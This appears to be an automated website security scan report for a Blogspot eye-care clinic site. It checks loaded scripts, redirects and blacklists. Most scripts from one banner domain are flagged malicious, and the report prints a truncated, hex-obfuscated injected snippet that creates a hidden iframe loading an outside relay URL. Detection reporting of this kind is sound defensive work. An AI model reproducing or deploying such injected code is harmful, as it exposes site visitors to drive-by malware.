Scanned pages/files
Request | Server response | Status |
http://virginiaeyecarecenter.blogspot.com/ | 200 OK Content-Length: 140644 Content-Type: text/html | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12514 Content-Type: application/javascript | clean |
http://eyesocialeyes.com/banner/Scripts/googlescripts_premierVS.js | 200 OK Content-Length: 2517 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/commonscripts.js | 200 OK Content-Length: 6507 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/slideshow.js | 200 OK Content-Length: 7760 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
https://ajax.googleapis.com/ajax/libs/prototype/1.7.0.0/prototype.js | 200 OK Content-Length: 163313 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js | 200 OK Content-Length: 2931 Content-Type: text/javascript | clean |
http://eyesocialeyes.com/banner/Scripts/customer_c_config.js | 200 OK Content-Length: 14824 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/c_smartmenus.js | 200 OK Content-Length: 20211 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/c_addon_fx_shadow.js | 200 OK Content-Length: 3752 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/c_addon_fx_fade.js | 200 OK Content-Length: 3271 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/shadowbox.js | 200 OK Content-Length: 67593 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/default_shadowbox.js | 200 OK Content-Length: 4593 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/norightclick.js | 200 OK Content-Length: 2870 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
| ||
http://eyesocialeyes.com/banner/Scripts/jquery.min.js | 200 OK Content-Length: 87262 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: virginiaeyecarecenter.blogspot.com
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Fri, 03 Oct 2014 23:42:28 GMT
ETag: "fba67eea-4f6f-4bf9-a0d3-3b9e79602581"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Fri, 03 Oct 2014 23:42:28 GMT
Last-Modified: Wed, 19 Mar 2014 08:56:34 GMT
Alternate-Protocol: 80:quic,p=0.01
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET / HTTP/1.1
Host: virginiaeyecarecenter.blogspot.com
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Fri, 03 Oct 2014 23:42:28 GMT
ETag: "fba67eea-4f6f-4bf9-a0d3-3b9e79602581"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Fri, 03 Oct 2014 23:42:28 GMT
Last-Modified: Wed, 19 Mar 2014 08:56:34 GMT
Alternate-Protocol: 80:quic,p=0.01
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: virginiaeyecarecenter.blogspot.com
Referer: http://www.google.com/search?q=virginiaeyecarecenter.blogspot.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: virginiaeyecarecenter.blogspot.com
Referer: http://www.google.com/search?q=virginiaeyecarecenter.blogspot.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=virginiaeyecarecenter.blogspot.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://virginiaeyecarecenter.blogspot.com/
Result: virginiaeyecarecenter.blogspot.com is not infected or malware details are not published yet.
Result: virginiaeyecarecenter.blogspot.com is not infected or malware details are not published yet.